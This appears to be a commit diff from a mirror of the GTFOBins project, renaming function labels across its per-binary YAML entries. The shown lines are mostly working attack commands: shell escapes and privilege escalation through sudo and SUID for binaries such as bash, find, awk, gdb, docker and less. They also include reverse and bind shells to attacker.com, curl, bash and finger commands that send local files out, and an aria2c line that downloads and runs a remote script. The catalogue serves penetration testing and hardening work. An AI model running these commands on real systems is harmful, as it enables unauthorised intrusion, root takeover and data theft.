mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-23 21:44:44 +01:00
Adopt new function names
This commit is contained in:
parent
1c77f099d3
commit
dd337b5ddf
@ -4,13 +4,13 @@
|
||||
shell:
|
||||
label: Shell
|
||||
description: |
|
||||
It can be used to break out from restricted environments by spawning an
|
||||
It can be used to break out from restricted environments by spawning an
|
||||
interactive system shell.
|
||||
|
||||
command:
|
||||
label: Command
|
||||
description: |
|
||||
It can be used to break out from restricted environments by running
|
||||
It can be used to break out from restricted environments by running
|
||||
non-interactive system commands.
|
||||
|
||||
reverse-shell:
|
||||
@ -19,8 +19,8 @@ reverse-shell:
|
||||
It can send back a reverse shell to a listening attacker to open a remote
|
||||
network access.
|
||||
|
||||
reverse-non-interactive-shell:
|
||||
label: Reverse non-interactive shell
|
||||
non-interactive-reverse-shell:
|
||||
label: Non-interactive reverse shell
|
||||
description: |
|
||||
It can send back a non-interactive reverse shell to a listening attacker to
|
||||
open a remote network access.
|
||||
@ -30,8 +30,8 @@ bind-shell:
|
||||
description: |
|
||||
It can bind a shell to a local port to allow remote network access.
|
||||
|
||||
bind-non-interactive-shell:
|
||||
label: Bind non-interactive shell
|
||||
non-interactive-bind-shell:
|
||||
label: Non-interactive bind shell
|
||||
description: |
|
||||
It can bind a non-interactive shell to a local port to allow remote network
|
||||
access.
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
apt-get changelog apt
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo apt-get changelog apt
|
||||
!/bin/sh
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
apt-get changelog apt
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo apt-get changelog apt
|
||||
!/bin/sh
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
description: Note that the subprocess is immediately sent to the background.
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
@ -10,14 +10,14 @@ functions:
|
||||
aria2c --on-download-error=$TF http://x
|
||||
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
|
||||
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
./aria2c --on-download-error=$TF http://x
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: ash
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: "./ash"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo ash
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
reverse-shell-non-interactive:
|
||||
non-interactive-reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@ -11,7 +11,7 @@ functions:
|
||||
s = "/inet/tcp/0/" RHOST "/" RPORT;
|
||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||
bind-shell-non-interactive:
|
||||
non-interactive-bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
@ -27,8 +27,8 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||
---
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
base64 "$LFILE" | base64 --decode
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./base64 "$LFILE" | base64 --decode
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo base64 "$LFILE" | base64 --decode
|
||||
|
@ -1,14 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: bash
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -21,7 +21,7 @@ functions:
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -58,8 +58,8 @@ functions:
|
||||
HISTTIMEFORMAT=$'\r\e[K'
|
||||
history -r $LFILE
|
||||
history
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: "./bash -p"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo bash
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: busybox sh
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
@ -16,9 +16,9 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./busybox cat "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
|
||||
code: "./busybox sh"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo busybox sh
|
||||
---
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cat "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cat "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cat "$LFILE"
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
|
||||
functions:
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
./chmod 0777 $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
sudo chmod 0777 $LFILE
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
description: This can be run with elevated privileges to change ownership and then read, write, or execute a file.
|
||||
functions:
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
./chown $(id -un):$(id -gn) $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_change
|
||||
sudo chown $(id -un):$(id -gn) $LFILE
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
|
||||
functions:
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
echo "DATA" > $TF
|
||||
./cp $TF $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: cpulimit -l 100 -f /bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo cpulimit -l 100 -f /bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: crontab -e
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: The commands are executed according to the crontab file edited via the `crontab` utility.
|
||||
code: sudo crontab -e
|
||||
---
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: csh
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: "./csh -b"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo csh
|
||||
---
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
@ -17,13 +17,13 @@ functions:
|
||||
code: |
|
||||
LFILE=/tmp/file_to_read
|
||||
curl file://$LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=file_to_save
|
||||
./curl $URL -o $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
cut -d "" -f1 "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./cut -d "" -f1 "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo cut -d "" -f1 "$LFILE"
|
||||
|
@ -1,13 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: dash
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./dash -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo dash
|
||||
---
|
||||
|
@ -8,11 +8,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
date -f $LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./date -f $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo date -f $LFILE
|
||||
|
@ -8,11 +8,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
dd if=LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | ./dd of=$LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | sudo -E dd of=$LFILE
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
diff --line-format=%L /dev/null $LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./diff --line-format=%L /dev/null $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo diff --line-format=%L /dev/null $LFILE
|
||||
|
@ -2,11 +2,11 @@
|
||||
description: |
|
||||
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
|
||||
functions:
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
|
||||
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
./docker run --rm -v /home/$USER:/h_docs ubuntu \
|
||||
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||
easy_install $TF
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -16,7 +16,7 @@ functions:
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")' > $TF/setup.py
|
||||
easy_install $TF
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
@ -36,7 +36,7 @@ functions:
|
||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
|
||||
easy_install $TF
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request. The file path must be absolute.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
@ -62,12 +62,12 @@ functions:
|
||||
TF=$(mktemp -d)
|
||||
echo 'print(open("file_to_read").read())' > $TF/setup.py
|
||||
easy_install $TF
|
||||
load-library:
|
||||
library-load:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
|
||||
easy_install $TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
@ -17,11 +17,11 @@ functions:
|
||||
ed file_to_read
|
||||
,p
|
||||
q
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: |
|
||||
./ed
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
file-write:
|
||||
- code: |
|
||||
@ -9,8 +9,8 @@ functions:
|
||||
C-x C-s
|
||||
file-read:
|
||||
- code: emacs file_to_read
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: env /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./env /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo env /bin/sh
|
||||
---
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
expand "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./expand "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo expand "$LFILE"
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
---
|
||||
|
@ -1,11 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'exec("/bin/sh")' > $TF/x.rb
|
||||
FACTERLIB=$TF facter
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'exec("/bin/sh")' > $TF/x.rb
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
---
|
||||
|
@ -2,13 +2,13 @@
|
||||
description: |
|
||||
`finger` hangs waiting for the remote peer to close the socket.
|
||||
functions:
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
LFILE=file_to_send
|
||||
finger "$(base64 $LFILE)@$RHOST"
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: flock -u / /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./flock -u / /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo flock -u / /bin/sh
|
||||
---
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
fold -w99999999 "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./fold -w99999999 "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo fold -w99999999 "$LFILE"
|
||||
|
@ -1,22 +1,22 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -11,7 +11,7 @@ functions:
|
||||
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")' -ex quit
|
||||
upload:
|
||||
file-upload:
|
||||
- description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
@ -27,7 +27,7 @@ functions:
|
||||
if sys.version_info.major == 3: import http.server as s, socketserver as ss
|
||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
|
||||
download:
|
||||
file-download:
|
||||
- description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
@ -44,12 +44,12 @@ functions:
|
||||
file-read:
|
||||
- description: This requires that GDB is compiled with Python support.
|
||||
code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit
|
||||
load-library:
|
||||
library-load:
|
||||
- description: This requires that GDB is compiled with Python support.
|
||||
code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- description: This requires that GDB is compiled with Python support.
|
||||
code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
||||
---
|
||||
|
@ -6,11 +6,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
grep '' $LFILE
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./grep '' $LFILE
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo grep '' $LFILE
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
head -c1G "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./head -c1G "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo head -c1G "$LFILE"
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: ionice /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./ionice /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo ionice /bin/sh
|
||||
---
|
||||
|
@ -4,11 +4,11 @@ description: |
|
||||
|
||||
This might not work if run by unprivileged users depending on the system configuration.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
journalctl
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo journalctl
|
||||
!/bin/sh
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
jq -Rr . "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./jq -Rr . "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo jq -Rr . "$LFILE"
|
||||
|
@ -1,14 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: ksh
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -21,7 +21,7 @@ functions:
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -49,8 +49,8 @@ functions:
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./ksh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo ksh
|
||||
---
|
||||
|
@ -7,10 +7,10 @@ description: |
|
||||
/lib64/ld-linux-x86-64.so.2
|
||||
```
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: /lib/ld.so /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./ld.so /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
@ -14,10 +14,10 @@ functions:
|
||||
echo DATA | less
|
||||
sfile_to_write
|
||||
q
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./less file_to_read
|
||||
---
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: ltrace -b -L /bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo ltrace -b -L /bin/sh
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: lua -e 'os.execute("/bin/sh")'
|
||||
reverse-shell-non-interactive:
|
||||
non-interactive-reverse-shell:
|
||||
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -15,7 +15,7 @@ functions:
|
||||
local b=assert(f:read("*a"));t:send(b);
|
||||
end;
|
||||
f:close();t:close();'
|
||||
bind-shell-non-interactive:
|
||||
non-interactive-bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
@ -26,7 +26,7 @@ functions:
|
||||
local r,x=c:receive();local f=assert(io.popen(r,"r"));
|
||||
local b=assert(f:read("*a"));c:send(b);
|
||||
end;c:close();f:close();'
|
||||
upload:
|
||||
